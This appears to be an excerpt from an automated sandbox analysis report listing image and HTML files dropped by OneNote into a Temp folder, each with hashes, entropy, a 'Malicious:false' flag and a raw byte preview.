                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Temp\{5BB35153-31E8-4EA4-AF3C-14B27F145130}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24268
                                                                                                  Entropy (8bit):6.946124661664625
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                  MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                  SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                  SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                  SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

                                                                                                  C:\Users\user\AppData\Local\Temp\{5DC7F243-DEC4-49EF-BBA5-C9276A2F55FD}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):47294
                                                                                                  Entropy (8bit):7.497888607667405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
                                                                                                  MD5:7A450E086AD14BA7D89BA5DB3D3AE6C7
                                                                                                  SHA1:E7AEAFCFCE476390E18C19456BDF6529D863D518
                                                                                                  SHA-256:BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
                                                                                                  SHA-512:9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1|....[...jQ.%Zb.......t..........*..V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=*N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

                                                                                                  C:\Users\user\AppData\Local\Temp\{5DC8BEDB-A0B9-42C2-A5BA-2F75ABA5C011}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Temp\{5DE823BB-FE63-4D95-8592-ACCA50679E6B}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Temp\{5EF4CF79-0113-4FA9-BC32-F8702590F196}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24268
                                                                                                  Entropy (8bit):6.946124661664625
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                  MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                  SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                  SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                  SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

                                                                                                  C:\Users\user\AppData\Local\Temp\{5FADE6EE-CAB8-44F0-B7D7-9262F1B7BB78}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Temp\{6020BB2B-11AE-464B-B685-D52CECCFFA97}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Temp\{61A338D2-7CAA-4F76-B490-CECA551A84AD}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Temp\{6264209F-297F-4FFF-982A-05818A601FC5}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Temp\{62AE9896-7211-4C5A-A04A-3A55A19FEBE8}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Temp\{63161C63-C6BF-4D26-AAC5-2E26B8F7C117}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):34299
                                                                                                  Entropy (8bit):7.247541176493898
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
                                                                                                  MD5:E9C52A7381075E4EBC59296F96C79399
                                                                                                  SHA1:BE295AD24D46E2420D7163642B658BF3234A27EA
                                                                                                  SHA-256:D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
                                                                                                  SHA-512:95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q|..'.;\..6..v......e...../.k..|.8..i..|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L|.'5...

                                                                                                  C:\Users\user\AppData\Local\Temp\{667CD68E-FDF4-4AE8-98E6-ACAC080CD6F1}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55804
                                                                                                  Entropy (8bit):7.433623355028275
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                  MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                  SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                  SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                  SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

                                                                                                  C:\Users\user\AppData\Local\Temp\{66E1866B-F229-4FB5-B508-C3ECB22A8206}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:HTML document, ASCII text, with very long lines (744), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):63088
                                                                                                  Entropy (8bit):5.191423193815745
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:6hKs7p4MAPEQbhh/8avllsFEaN3K19Z5zkzCIi5:6L7p4MafVLYEaN3K19ZWzCn5
                                                                                                  MD5:45282862AEB428FFB5D4986704A8F4D5
                                                                                                  SHA1:FA2B0A82F3CA6BC7C00704556C9494B303613972
                                                                                                  SHA-256:AF0C7D355BB6A495D038FD05217209054107D31AA6199C491B74AE3D24B11C7E
                                                                                                  SHA-512:DB6457AF502F45665CE4CC6573C5746607D8FFC661F0DCB224BECEED93886F6C6194561CACC0EFA543F0B2F62DB976742F42C6C8102C5B11B65329757110B1DB
                                                                                                  Malicious:false
